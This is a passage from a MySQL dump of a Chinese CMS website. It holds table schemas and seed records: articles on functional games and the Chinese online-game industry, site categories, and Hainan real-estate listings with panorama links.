INSERT INTO `ey_archives` VALUES ('54', '21', '', '1', '0', '游戏展示八', '', '/public/upload/article/2018/08/18/8f97c1d89026d09b9ac5b23c9b05a29d.jpg', '0', '0', '0', '0', '0', '1', '0', '0', '0', '', '', '274', '0', '', '0', '', '', ' 开发功能性游戏,对在全球网络游戏市场份额占比近10%的腾讯来说,显然是一个重要节点,对全行业也有积极影响。但是,对我国这一全球最大的网络游戏市场而言,对不断加大走出去力度的众多中国互联网企业而言,这仅仅是漫长征程的第一步。开发出更多可以服务具体应用目的和应用场景的,具有正面主流价值的功能游戏,应当成为全行业的共识。因为,这绝不仅仅关乎企业自身的商业利益,对于改变当前社会上对网络游戏的一些片面认识,促进网络游戏全行业的转型升级,更是有着重要意义。', '0', '0', '0', '0.00', '0', '0.00', '0', '0', '0', '99999', '1', '0', '', '1', '100', 'cn', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '', '0', '0', '0', '1534491184', '1535531282', '0');
INSERT INTO `ey_archives` VALUES ('53', '21', '', '1', '0', '游戏展示七', '', '/public/upload/article/2018/08/18/ab1e7a9cfd0a681e5a15f4d54a1e1094.jpg', '0', '0', '0', '0', '0', '1', '0', '0', '0', '', '', '202', '0', '', '0', '', '', '以网络游戏为代表的网络文艺治理,已经构成我们无法回避的时代性挑战。动员政府部门、专家学者、行业企业、游戏用户和社会媒体等多方力量的广泛参与,开展对包括功能游戏在内的不同类型网络游戏的评论、批评,科学认识和评价网络游戏的复合价值,激浊扬清,发掘游戏文化中的优秀内容,加强价值引导和舆论监督,规范网络游戏经营行为,建立和完善立足于我国国情的网络游戏作品评价体系,进而最终完成我国网络游戏全行业的转型升级,促进我国以网络游戏为代表的网络文艺的健康发展,其重大意义就不仅仅局限于网络游戏行业本身,其对于我国网络文艺乃至整体性文化产业格局的转型升级,都将产生示范和引领作用。', '0', '0', '0', '0.00', '0', '0.00', '0', '0', '0', '99999', '1', '0', '', '1', '100', 'cn', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '', '0', '0', '0', '1534491152', '1535531282', '0');
INSERT INTO `ey_archives` VALUES ('52', '21', '', '1', '0', '游戏展示六', '', '/public/upload/article/2018/08/18/54148d16ead44dba35098eb70ead1e3a.jpg', '0', '0', '0', '0', '0', '1', '0', '0', '0', '', '', '120', '0', '', '0', '', '', '未来几年,功能游戏将有两位数的年均复合增长率,市场规模将迅速增长到300亿元到500亿元,其广阔的发展前景和深远影响更将远远超过其商业价值。在可预见的将来,功能游戏还将进一步主流化,成为主流社会日常性的互联网应用工具。过去几年,我国出现了《韩熙载夜宴图》《每日故宫》《紫禁城祥瑞》《皇帝的一天》以及《榫卯》《折扇》等和传统文化深入融合的功能游戏精品佳作,但就我国网络游戏行业的实际发展情况而言,在功能游戏领域,我们只是刚刚起步。', '0', '0', '0', '0.00', '0', '0.00', '0', '0', '0', '99999', '1', '0', '', '1', '100', 'cn', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '', '0', '0', '0', '1534491102', '1535531282', '0');
INSERT INTO `ey_archives` VALUES ('34', '14', '', '1', '0', '在全部网民中的占比接近7成。我国网络游戏行业整体营收达2189.6亿元', '', '', '0', '0', '0', '0', '0', '1', '0', '0', '0', '', '', '250', '0', '', '0', '', '', ' 自世纪之交以来,网络游戏及其所依托的网络文艺,作为移动互联网时代新兴媒介的文化娱乐形态,在全世界方兴未艾。2017年,我国网络游戏用户整体规模已有5亿左右,在全部网民中的占比接近7成。我国网络游戏行业整体营收达2189.6亿元,相当于全球电影票房的总和。 需要指出的是,一般网民的网络游戏概念基本上停留在消遣娱乐的刻板化印象上。但实际上,网络游戏的内在构成已经有了相当程度的发展,有着丰富的内涵。例如,功能游戏是网络游戏一个极为重要的组成部分,是以解决社会和行业问题为主要目的的游戏类型,但其在主流视野中却鲜为人知', '0', '0', '0', '0.00', '0', '0.00', '0', '0', '0', '99999', '1', '0', '', '1', '100', 'cn', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '', '0', '0', '0', '1534242157', '1534493286', '0');
INSERT INTO `ey_archives` VALUES ('50', '2', '', '1', '0', '热门游戏4', '', '/public/upload/article/2018/08/18/1ff50a196ecc3b7c728b04618cf3ade7.jpg', '0', '0', '0', '0', '0', '1', '0', '0', '0', '', '', '300', '0', '', '0', '', '', '', '0', '0', '0', '0.00', '0', '0.00', '0', '0', '0', '99999', '1', '0', '', '1', '100', 'cn', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '', '0', '0', '0', '1534490623', '1534584661', '0');
INSERT INTO `ey_archives` VALUES ('51', '21', '', '1', '0', '游戏展示五', '', '/public/upload/article/2018/08/18/72e8e76a047c2c8888a47a4ef0f82f3c.jpg', '0', '0', '0', '0', '0', '1', '0', '0', '0', '', '', '296', '0', '', '0', '', '', ' 自世纪之交以来,网络游戏及其所依托的网络文艺,作为移动互联网时代新兴媒介的文化娱乐形态,在全世界方兴未艾。2017年,我国网络游戏用户整体规模已有5亿左右,在全部网民中的占比接近7成。我国网络游戏行业整体营收达2189.6亿元,相当于全球电影票房的总和。 需要指出的是,一般网民的网络游戏概念基本上停留在消遣娱乐的刻板化印象上。但实际上,网络游戏的内在构成已经有了相当程度的发展,有着丰富的内涵。例如,功能游戏是网络游戏一个极为重要的组成部分,是以解决社会和行业问题为主要目的的游戏类型,但其在主流视野中却鲜为人知。 1994年,基于海湾战争的经验,美国海军陆战队成立了世界上第一个功能游戏军事训练机构,将功能游戏作为军队模拟训练的辅助手段。经过互联网领域在世纪之交的爆炸式发展,2006年之后,功能游戏逐渐拓展到了民用领域,在教育、医疗、交通、应急管理、环境保护、企业管理、文化传承等方面发挥了重要作用,为很多国家的政府部门、社会机构解决社会公共生活的各类难题,提供了不可替代的治理演练和经验。', '0', '0', '0', '0.00', '0', '0.00', '0', '0', '0', '99999', '1', '0', '', '1', '100', 'cn', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '', '0', '0', '0', '1534491071', '1535531282', '0');
INSERT INTO `ey_archives` VALUES ('47', '2', '', '1', '0', '热门游戏1', '', '/public/upload/article/2018/08/18/5c16821429cc96e575013b5da997d099.jpg', '0', '0', '0', '0', '0', '1', '0', '0', '0', '', '', '231', '0', '', '0', '', '', '', '0', '0', '0', '0.00', '0', '0.00', '0', '0', '0', '99999', '1', '0', '', '1', '100', 'cn', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '', '0', '0', '0', '1534473672', '1534584755', '0');
INSERT INTO `ey_archives` VALUES ('48', '2', '', '1', '0', '热门游戏2', '', '/public/upload/article/2018/08/18/8bc6591efdda3e35e635001fce46adf2.jpg', '0', '0', '0', '0', '0', '1', '0', '0', '0', '', '', '256', '0', '', '0', '', '', '', '0', '0', '0', '0.00', '0', '0.00', '0', '0', '0', '99999', '1', '0', '', '1', '100', 'cn', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '', '0', '0', '0', '1534473824', '1534584735', '0');
INSERT INTO `ey_archives` VALUES ('49', '2', '', '1', '0', '热门游戏3', '', '/public/upload/article/2018/08/18/457bb093c7183aa48abf3c43dcb98577.jpg', '0', '0', '0', '0', '0', '1', '0', '0', '0', '', '', '182', '0', '', '0', '', '', '', '0', '0', '0', '0.00', '0', '0.00', '0', '0', '0', '99999', '1', '0', '', '1', '100', 'cn', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '', '0', '0', '0', '1534490511', '1534584703', '0');
INSERT INTO `ey_archives` VALUES ('28', '21', '', '1', '0', '游戏展示二', '', '/public/upload/article/2018/08/18/9eb7667230e11f3b3983ee404d4d9fd4.jpg', '0', '0', '0', '0', '0', '1', '0', '0', '0', '', '', '123', '0', '', '0', '', '', '未来几年,功能游戏将有两位数的年均复合增长率,市场规模将迅速增长到300亿元到500亿元,其广阔的发展前景和深远影响更将远远超过其商业价值。在可预见的将来,功能游戏还将进一步主流化,成为主流社会日常性的互联网应用工具。过去几年,我国出现了《韩熙载夜宴图》《每日故宫》《紫禁城祥瑞》《皇帝的一天》以及《榫卯》《折扇》等和传统文化深入融合的功能游戏精品佳作,但就我国网络游戏行业的实际发展情况而言,在功能游戏领域,我们只是刚刚起步。', '0', '0', '0', '0.00', '0', '0.00', '0', '0', '0', '99999', '1', '0', '', '1', '100', 'cn', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '', '0', '0', '0', '1534155527', '1535531282', '0');
INSERT INTO `ey_archives` VALUES ('22', '21', '', '1', '0', '游戏展示四', '', '/public/upload/article/2018/08/18/2162e3e3b31fca0082135ffd6e74b3bc.jpg', '0', '0', '0', '0', '0', '1', '0', '0', '0', '', '', '153', '0', '', '0', '', '', '开发功能性游戏,对在全球网络游戏市场份额占比近10%的腾讯来说,显然是一个重要节点,对全行业也有积极影响。但是,对我国这一全球最大的网络游戏市场而言,对不断加大走出去力度的众多中国互联网企业而言,这仅仅是漫长征程的第一步。开发出更多可以服务具体应用目的和应用场景的,具有正面主流价值的功能游戏,应当成为全行业的共识。因为,这绝不仅仅关乎企业自身的商业利益,对于改变当前社会上对网络游戏的一些片面认识,促进网络游戏全行业的转型升级,更是有着重要意义。', '0', '0', '0', '0.00', '0', '0.00', '0', '0', '0', '99999', '1', '0', '', '1', '100', 'cn', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '', '0', '0', '0', '1533627969', '1535531282', '0');
INSERT INTO `ey_archives` VALUES ('23', '21', '', '1', '0', '游戏展示三', '', '/public/upload/article/2018/08/18/28376faed92df519535203016f4b5490.jpg', '0', '0', '0', '0', '0', '1', '0', '0', '0', '', '', '251', '0', '', '0', '', '', '1994年,基于海湾战争的经验,美国海军陆战队成立了世界上第一个功能游戏军事训练机构,将功能游戏作为军队模拟训练的辅助手段。经过互联网领域在世纪之交的爆炸式发展,2006年之后,功能游戏逐渐拓展到了民用领域,在教育、医疗、交通、应急管理、环境保护、企业管理、文化传承等方面发挥了重要作用,为很多国家的政府部门、社会机构解决社会公共生活的各类难题,提供了不可替代的治理演练和经验。', '0', '0', '0', '0.00', '0', '0.00', '0', '0', '0', '99999', '1', '0', '', '1', '100', 'cn', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '', '0', '0', '0', '1533628002', '1535531282', '0');
INSERT INTO `ey_archives` VALUES ('27', '13', '', '6', '0', '人才招聘', '', '', '0', '0', '0', '0', '0', '1', '0', '0', '0', '', '', '0', '0', '', '0', '', '', '', '0', '0', '0', '0.00', '0', '0.00', '0', '0', '0', '99999', '1', '0', '', '1', '100', 'cn', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '', '0', '0', '0', '1534151326', '1534318765', '0');
INSERT INTO `ey_archives` VALUES ('44', '14', '', '1', '0', '以网络游戏为代表的网络文艺治理,已经构成我们无法回避的时代性挑战', '', '', '0', '0', '0', '0', '0', '1', '0', '0', '0', '', '', '135', '0', '', '0', '', '', '动员政府部门、专家学者、行业企业、游戏用户和社会媒体等多方力量的广泛参与,开展对包括功能游戏在内的不同类型网络游戏的评论、批评,科学认识和评价网络游戏的复合价值,激浊扬清,发掘游戏文化中的优秀内容,加强价值引导和舆论监督,规范网络游戏经营行为,建立和完善立足于我国国情的网络游戏作品评价体系,进而最终完成我国网络游戏全行业的转型升级,促进我国以网络游戏为代表的网络文艺的健康发展,其重大意义就不仅仅局限于网络游戏行业本身,其对于我国网络文艺乃至整体性文化产业格局的转型升级,都将产生示范和引领作用。', '0', '0', '0', '0.00', '0', '0.00', '0', '0', '0', '99999', '1', '0', '', '1', '100', 'cn', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '', '0', '0', '0', '1534404634', '1535532139', '0');
INSERT INTO `ey_archives` VALUES ('45', '14', '', '1', '0', '开发功能性游戏,对在全球网络游戏市场份额占比近10%的腾讯来说', '', '/public/upload/article/2018/08/29/8d43045f414c001f6763e16319cb080c.jpg', '0', '0', '0', '0', '0', '1', '0', '0', '0', '', '', '151', '0', '', '0', '', '', ' 开发功能性游戏,对在全球网络游戏市场份额占比近10%的腾讯来说,显然是一个重要节点,对全行业也有积极影响。但是,对我国这一全球最大的网络游戏市场而言,对不断加大走出去力度的众多中国互联网企业而言,这仅仅是漫长征程的第一步。开发出更多可以服务具体应用目的和应用场景的,具有正面主流价值的功能游戏,应当成为全行业的共识。因为,这绝不仅仅关乎企业自身的商业利益,对于改变当前社会上对网络游戏的一些片面认识,促进网络游戏全行业的转型升级,更是有着重要意义。', '0', '0', '0', '0.00', '0', '0.00', '0', '0', '0', '99999', '1', '0', '', '1', '100', 'cn', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '', '0', '0', '0', '1534404653', '1535503482', '0');
INSERT INTO `ey_archives` VALUES ('46', '14', '', '1', '0', '功能游戏将有两位数的年均复合增长率', '', '/public/upload/article/2018/08/29/26c0a059367966316bca704b0913ec5d.jpg', '0', '0', '0', '0', '0', '1', '0', '0', '0', '', '', '122', '0', '', '0', '', '', ' 未来几年,功能游戏将有两位数的年均复合增长率,市场规模将迅速增长到300亿元到500亿元,其广阔的发展前景和深远影响更将远远超过其商业价值。在可预见的将来,功能游戏还将进一步主流化,成为主流社会日常性的互联网应用工具。过去几年,我国出现了《韩熙载夜宴图》《每日故宫》《紫禁城祥瑞》《皇帝的一天》以及《榫卯》《折扇》等和传统文化深入融合的功能游戏精品佳作,但就我国网络游戏行业的实际发展情况而言,在功能游戏领域,我们只是刚刚起步。', '0', '0', '0', '0.00', '0', '0.00', '0', '0', '0', '99999', '1', '0', '', '1', '100', 'cn', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '', '0', '0', '0', '1534404698', '1535503467', '0');
-- -----------------------------
-- Table structure for `ey_archives_flag`
-- -----------------------------
DROP TABLE IF EXISTS `ey_archives_flag`;
CREATE TABLE `ey_archives_flag` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`flag_name` varchar(255) NOT NULL DEFAULT '' COMMENT '文档属性名称',
`flag_attr` varchar(10) NOT NULL DEFAULT '' COMMENT '属性值',
`flag_fieldname` varchar(255) NOT NULL DEFAULT '' COMMENT '字段名',
`status` tinyint(1) unsigned NOT NULL DEFAULT '1' COMMENT '状态, 1---显示, 0---隐藏',
`sort_order` int(11) unsigned NOT NULL DEFAULT '0',
`lang` varchar(50) DEFAULT 'cn' COMMENT '语言标识',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`),
UNIQUE KEY `flag_attr` (`flag_attr`) USING BTREE
) ENGINE=MyISAM AUTO_INCREMENT=10 DEFAULT CHARSET=utf8 COMMENT='文档属性配置表';
-- -----------------------------
-- Records of `ey_archives_flag`
-- -----------------------------
INSERT INTO `ey_archives_flag` VALUES ('1', '头条', 'h', 'is_head', '1', '1', 'cn', '1606272350', '1606272350');
INSERT INTO `ey_archives_flag` VALUES ('2', '推荐', 'c', 'is_recom', '1', '2', 'cn', '1606272350', '1606272350');
INSERT INTO `ey_archives_flag` VALUES ('3', '加推', 'a', 'is_special', '1', '3', 'cn', '1606272350', '1606272350');
INSERT INTO `ey_archives_flag` VALUES ('4', '标粗', 'b', 'is_b', '1', '4', 'cn', '1606272350', '1606272350');
INSERT INTO `ey_archives_flag` VALUES ('5', '有图', 'p', 'is_litpic', '1', '5', 'cn', '1606272350', '1606272350');
INSERT INTO `ey_archives_flag` VALUES ('6', '外链', 'j', 'is_jump', '1', '6', 'cn', '1606272350', '1606272350');
INSERT INTO `ey_archives_flag` VALUES ('7', '轮播', 's', 'is_slide', '0', '7', 'cn', '1606272350', '1606272350');
INSERT INTO `ey_archives_flag` VALUES ('8', '滚动', 'r', 'is_roll', '0', '8', 'cn', '1606272350', '1606272350');
INSERT INTO `ey_archives_flag` VALUES ('9', '热文', 'd', 'is_diyattr', '0', '9', 'cn', '1606272350', '1606272350');
-- -----------------------------
-- Table structure for `ey_arcmulti`
-- -----------------------------
DROP TABLE IF EXISTS `ey_arcmulti`;
CREATE TABLE `ey_arcmulti` (
`id` mediumint(8) unsigned NOT NULL AUTO_INCREMENT COMMENT '自增ID',
`tagid` varchar(60) NOT NULL DEFAULT '' COMMENT '标签ID',
`tagname` varchar(60) NOT NULL DEFAULT '' COMMENT '标签名',
`innertext` text NOT NULL COMMENT '标签模板代码',
`pagesize` int(10) NOT NULL DEFAULT '0' COMMENT '分页列表',
`querysql` text NOT NULL COMMENT '完整SQL',
`ordersql` varchar(200) DEFAULT '' COMMENT '排序SQL',
`addfieldsSql` varchar(255) DEFAULT '' COMMENT '附加字段SQL',
`addtableName` varchar(50) DEFAULT '' COMMENT '附加字段的数据表,不包含表前缀',
`attstr` text COMMENT '属性字符串',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='多页标记存储数据表';
-- -----------------------------
-- Table structure for `ey_arcrank`
-- -----------------------------
DROP TABLE IF EXISTS `ey_arcrank`;
CREATE TABLE `ey_arcrank` (
`id` smallint(5) unsigned NOT NULL AUTO_INCREMENT COMMENT '权限ID',
`rank` smallint(6) DEFAULT '0' COMMENT '权限值',
`name` char(20) DEFAULT '' COMMENT '会员名称',
`lang` varchar(50) DEFAULT 'cn' COMMENT '语言标识',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=utf8 ROW_FORMAT=DYNAMIC COMMENT='文档阅读权限表';
-- -----------------------------
-- Records of `ey_arcrank`
-- -----------------------------
INSERT INTO `ey_arcrank` VALUES ('1', '0', '开放浏览', 'cn', '0', '1552376880');
INSERT INTO `ey_arcrank` VALUES ('2', '-1', '待审核稿件', 'cn', '0', '1552376880');
-- -----------------------------
-- Table structure for `ey_arctype`
-- -----------------------------
DROP TABLE IF EXISTS `ey_arctype`;
CREATE TABLE `ey_arctype` (
`id` int(10) NOT NULL AUTO_INCREMENT,
`channeltype` int(10) DEFAULT '0' COMMENT '栏目顶级模型ID',
`current_channel` int(10) DEFAULT '0' COMMENT '栏目当前模型ID',
`parent_id` int(10) DEFAULT '0' COMMENT '栏目上级ID',
`topid` int(10) DEFAULT '0' COMMENT '顶级栏目ID',
`typename` varchar(200) DEFAULT '' COMMENT '栏目名称',
`dirname` varchar(200) DEFAULT '' COMMENT '目录英文名',
`dirpath` varchar(200) DEFAULT '' COMMENT '目录存放HTML路径',
`diy_dirpath` varchar(200) DEFAULT '' COMMENT '列表静态文件存放规则',
`rulelist` varchar(200) DEFAULT '' COMMENT '列表静态文件存放规则',
`ruleview` varchar(200) DEFAULT '' COMMENT '文档静态文件存放规则',
`englist_name` varchar(200) DEFAULT '' COMMENT '栏目英文名',
`grade` tinyint(1) DEFAULT '0' COMMENT '栏目等级',
`typelink` varchar(200) DEFAULT '' COMMENT '栏目链接',
`litpic` varchar(250) DEFAULT '' COMMENT '栏目图片',
`templist` varchar(200) DEFAULT '' COMMENT '列表模板文件名',
`tempview` varchar(200) DEFAULT '' COMMENT '文档模板文件名',
`seo_title` varchar(200) DEFAULT '' COMMENT 'SEO标题',
`seo_keywords` varchar(200) DEFAULT '' COMMENT 'seo关键字',
`seo_description` text COMMENT 'seo描述',
`sort_order` int(10) DEFAULT '0' COMMENT '排序号',
`is_hidden` tinyint(1) DEFAULT '0' COMMENT '是否隐藏栏目:0=显示,1=隐藏',
`is_part` tinyint(1) DEFAULT '0' COMMENT '栏目属性:0=内容栏目,1=外部链接',
`admin_id` int(10) DEFAULT '0' COMMENT '管理员ID',
`is_del` tinyint(1) DEFAULT '0' COMMENT '伪删除,1=是,0=否',
`del_method` tinyint(1) DEFAULT '0' COMMENT '伪删除状态,1为主动删除,2为跟随上级栏目被动删除',
`status` tinyint(1) DEFAULT '1' COMMENT '启用 (1=正常,0=屏蔽)',
`is_release` tinyint(1) DEFAULT '0' COMMENT '栏目是否应用于会员投稿发布,1是,0否',
`weapp_code` varchar(50) DEFAULT '' COMMENT '插件栏目唯一标识',
`lang` varchar(50) DEFAULT 'cn' COMMENT '语言标识',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
`target` tinyint(1) DEFAULT '0' COMMENT '新窗口打开',
`nofollow` tinyint(1) DEFAULT '0' COMMENT '防抓取',
`typearcrank` int(10) DEFAULT '0' COMMENT '阅读权限:0=开放浏览,-1=待审核稿件',
`empty_logic` tinyint(1) DEFAULT '0' COMMENT '空内容逻辑',
PRIMARY KEY (`id`),
UNIQUE KEY `dirname` (`dirname`,`lang`) USING BTREE,
KEY `parent_id` (`channeltype`,`parent_id`) USING BTREE
) ENGINE=MyISAM AUTO_INCREMENT=24 DEFAULT CHARSET=utf8;
-- -----------------------------
-- Records of `ey_arctype`
-- -----------------------------
INSERT INTO `ey_arctype` VALUES ('1', '6', '6', '0', '0', '关于我们', 'guanyuwomen', '/guanyuwomen', '/guanyuwomen', '', '', 'ABOUT US', '0', '', '/public/upload/arctype/2018/08/15/e584e33d3b5edb37535cc7d9e4416085.jpg', 'lists_single.htm', '', '', '', '', '1', '0', '0', '0', '0', '0', '1', '0', '', 'cn', '1533541630', '1651715312', '0', '0', '0', '1');
INSERT INTO `ey_arctype` VALUES ('2', '1', '1', '0', '0', '热门游戏', 'chanpzhanshi', '/chanpzhanshi', '/chanpzhanshi', '', '', 'TOP GAMES', '0', '', '', 'lists_article_img.htm', 'view_article.htm', '', '', '', '2', '0', '0', '0', '0', '0', '1', '1', '', 'cn', '1533541671', '1651715312', '0', '0', '0', '0');
INSERT INTO `ey_arctype` VALUES ('3', '1', '1', '0', '0', '新闻资讯', 'xinwenzixun', '/xinwenzixun', '/xinwenzixun', '', '', 'NEWS', '0', '', '', 'lists_article.htm', 'view_article.htm', '', '', '', '3', '0', '0', '0', '0', '0', '1', '1', '', 'cn', '1533541713', '1651715312', '0', '0', '0', '0');
INSERT INTO `ey_arctype` VALUES ('14', '1', '1', '0', '0', '功能介绍', 'gongnenjieshao', '/gongnenjieshao', '/gongnenjieshao', '', '', 'SAFETY KNOWLEDGE', '0', '', '', 'lists_article.htm', 'view_article.htm', '', '', '', '7', '0', '0', '0', '0', '0', '1', '1', '', 'cn', '1534151499', '1651715312', '0', '0', '0', '0');
INSERT INTO `ey_arctype` VALUES ('6', '1', '1', '0', '0', '游戏展示', 'youxizhanshi', '/youxizhanshi', '/youxizhanshi', '', '', 'THE ENGINEERING CASE', '0', '', '', 'lists_article_product.htm', 'view_article.htm', '', '', '', '4', '0', '0', '0', '0', '0', '1', '1', '', 'cn', '1533541928', '1651715312', '0', '0', '0', '0');
INSERT INTO `ey_arctype` VALUES ('7', '8', '8', '0', '0', '在线留言', 'zaixianliuyan', '/zaixianliuyan', '/zaixianliuyan', '', '', 'Message', '0', '', '', 'lists_guestbook.htm', '', '', '', '', '5', '0', '0', '0', '0', '0', '1', '0', '', 'cn', '1533542038', '1651715312', '0', '0', '0', '0');
INSERT INTO `ey_arctype` VALUES ('8', '6', '6', '0', '0', '联系我们', 'lianxiwomen', '/lianxiwomen', '/lianxiwomen', '', '', 'CONTACT US', '0', '', '', 'lists_single.htm', '', '', '', '', '8', '0', '0', '0', '0', '0', '1', '0', '', 'cn', '1533542101', '1686213669', '0', '0', '0', '1');
INSERT INTO `ey_arctype` VALUES ('13', '6', '6', '0', '0', '人才招聘', 'rencaizhaopin', '/rencaizhaopin', '/rencaizhaopin', '', '', 'RECRUITMENT', '0', '', '', 'lists_single.htm', '', '', '', '', '6', '0', '0', '0', '0', '0', '1', '0', '', 'cn', '1534151326', '1651715312', '0', '0', '0', '1');
INSERT INTO `ey_arctype` VALUES ('23', '1', '1', '6', '6', '互动游戏', 'hudongyouxi', '/youxizhanshi/hudongyouxi', '/youxizhanshi/hudongyouxi', '', '', '', '1', '', '', 'lists_article_product.htm', 'view_article.htm', '', '', '', '100', '0', '0', '0', '0', '0', '1', '1', '', 'cn', '1534499052', '1651715312', '0', '0', '0', '0');
INSERT INTO `ey_arctype` VALUES ('21', '1', '1', '6', '6', '竞技游戏', 'jingjiyouxi', '/youxizhanshi/jingjiyouxi', '/youxizhanshi/jingjiyouxi', '', '', '', '1', '', '', 'lists_article_product.htm', 'view_article.htm', '', '', '', '100', '0', '0', '0', '0', '0', '1', '1', '', 'cn', '1534499010', '1651715312', '0', '0', '0', '0');
INSERT INTO `ey_arctype` VALUES ('22', '1', '1', '6', '6', '场景游戏', 'changjingyouxi', '/youxizhanshi/changjingyouxi', '/youxizhanshi/changjingyouxi', '', '', '', '1', '', '', 'lists_article_product.htm', 'view_article.htm', '', '', '', '100', '0', '0', '0', '0', '0', '1', '1', '', 'cn', '1534499036', '1651715312', '0', '0', '0', '0');
-- -----------------------------
-- Table structure for `ey_article17_content`
-- -----------------------------
DROP TABLE IF EXISTS `ey_article17_content`;
CREATE TABLE `ey_article17_content` (
`id` int(10) NOT NULL AUTO_INCREMENT,
`aid` int(10) DEFAULT '0' COMMENT '文档ID',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
`content` longtext COMMENT '文章内容',
`vrdz` varchar(251) NOT NULL DEFAULT '' COMMENT '全景地址',
PRIMARY KEY (`id`),
KEY `aid` (`aid`) USING BTREE
) ENGINE=MyISAM AUTO_INCREMENT=9 DEFAULT CHARSET=utf8 COMMENT='附加表';
-- -----------------------------
-- Records of `ey_article17_content`
-- -----------------------------
INSERT INTO `ey_article17_content` VALUES ('1', '34', '1649299290', '1649299290', '富力湾海南富力湾与夏威夷、加勒比海、巴厘岛这些世界著名的旅游胜地同在一条黄金北纬18&deg;上,是富力集团在海南布局的唯一一个高端热带滨海休闲度假社区,且紧邻亚洲大型海洋主题公园-富力湾海洋欢乐世界,轻松享有休闲惬意的度假生活。', 'https://720yun.com/t/83vkuwrw01w?scene_id=40544503');
INSERT INTO `ey_article17_content` VALUES ('2', '35', '1649299290', '1649299290', '合景汀澜海岸凝萃合景泰富17年国际豪宅开发经验而倾力打造的旅游地产新作,抢占国际旅游岛未来高端的珍珠海岸核心区位,荟萃众多奢侈度假配套。更携手大师团队定制一线海幕豪宅,在这里找到如塞舌尔般的私密海岸天堂。', 'https://720yun.com/t/80vkc72wdpe?scene_id=64311939');
INSERT INTO `ey_article17_content` VALUES ('3', '36', '1649299290', '1649299290', '&ldquo;海棠华着&rdquo;位于中国三亚海棠湾-中国国家海岸,三亚海棠湾海棠北路18号(凯宾斯基酒店旁),项目占地面积为29.3万平米,容积率0.4,绿化率62.2%,地上建筑面积约12万平米,一共分为三期开发,一期为174套别墅产品,主力户型为约300-400平米(使用面积)的院落别墅户型,是三亚一线临海别墅群,配建拥有百年历史的华尔道夫酒店,该酒店素有&ldquo;总统行宫&rdquo;的称号。', 'https://720yun.com/t/58vkc72l5iq?scene_id=64260374');
INSERT INTO `ey_article17_content` VALUES ('4', '37', '1649299290', '1649299290', '融创日月湾,拥有目前海南的北纬 18&deg;绝品度假双岛。日月湾旅游度假区总规划面积约3.45万亩,,日月岛合计约 1492 亩,其中日岛约 840亩,总建筑面积约 76 万㎡,建筑密度 16.5%,绿化率高达 52%。从日月湾高速出口至项目1500米路程,途经滨海大道,可以一览日月湾迷人的滨海风光。经过与陆地连接的日岛跨海大桥,可以领略别样的海岛风情。&nbsp;', 'https://720yun.com/t/83vkuwrw01w?scene_id=40544503');
INSERT INTO `ey_article17_content` VALUES ('5', '38', '1649299290', '1649299290', '臻园一期&bull;洋房概况:前期共推出108套洋房,总高6层,一梯两户,建筑面积75平,2房2厅一厨一卫两阳台,得房率高,性价比高。板楼设计,通透户型,双阳台设计,带品质精装,满足你的度假、投资的双重需求。海南第一个温泉度假区,东南亚异域风情小镇,侨乡之城,享受成熟的商业配套和淳朴的小镇风情。', 'https://720yun.com/t/3fvkumqh5ib?scene_id=42183767');
INSERT INTO `ey_article17_content` VALUES ('6', '39', '1649299290', '1649299290', '万科海上大都会左岸项目位于三亚市城央湾区三亚湾,南临20公里椰梦长廊,步行200米即可畅享沙滩大海。三亚湾路和新城路围绕在项目南北两侧,与三亚市核心干道凤凰路、规划核心干道三横路毗邻。导航距离凤凰机场约6公里,导航距离三亚动车站约8公里。周边有多条公交及旅游线路,直达海棠湾免税城,亚龙湾,大小洞天,城市乐园等,交通四通八达,非常便利。', 'https://720yun.com/t/2fvkc7phzr9?scene_id=64241384');
INSERT INTO `ey_article17_content` VALUES ('7', '40', '1649299290', '1649299290', '梦幻不夜城,蜈支洲岛,南田温泉,水稻国家公园,海中海高尔夫,亚特兰蒂斯水上乐园等。', 'https://720yun.com/t/05vku72b7ql?scene_id=40965268');
INSERT INTO `ey_article17_content` VALUES ('8', '41', '1649299290', '1649299290', '龙栖海岸位于海南&middot;大三亚&middot;龙栖湾,龙栖湾滨海旅游度假区,由海南中城投开发建设。北纬18&deg;以南,307亩观海大城,南北通透两梯两户。56㎡海豚大阳台,拥16公里龙栖湾首栖霞海岸,观海阅山,不负盛景。邻南中国海上文旅基地、南繁基地、万豪酒店。项目釆用两梯两户纯板式洋房设计,户型设计合理,全明格局,公摊少、采光足、南北通透,电梯入户。', 'https://720yun.com/t/5bvkcy1ygdl?scene_id=62651738');
-- -----------------------------
-- Table structure for `ey_article_content`
-- -----------------------------
DROP TABLE IF EXISTS `ey_article_content`;
CREATE TABLE `ey_article_content` (
`id` int(10) NOT NULL AUTO_INCREMENT,
`aid` int(10) DEFAULT '0' COMMENT '文档ID',
`content` longtext COMMENT '内容详情',
`content_ey_m` longtext COMMENT '手机端内容详情',
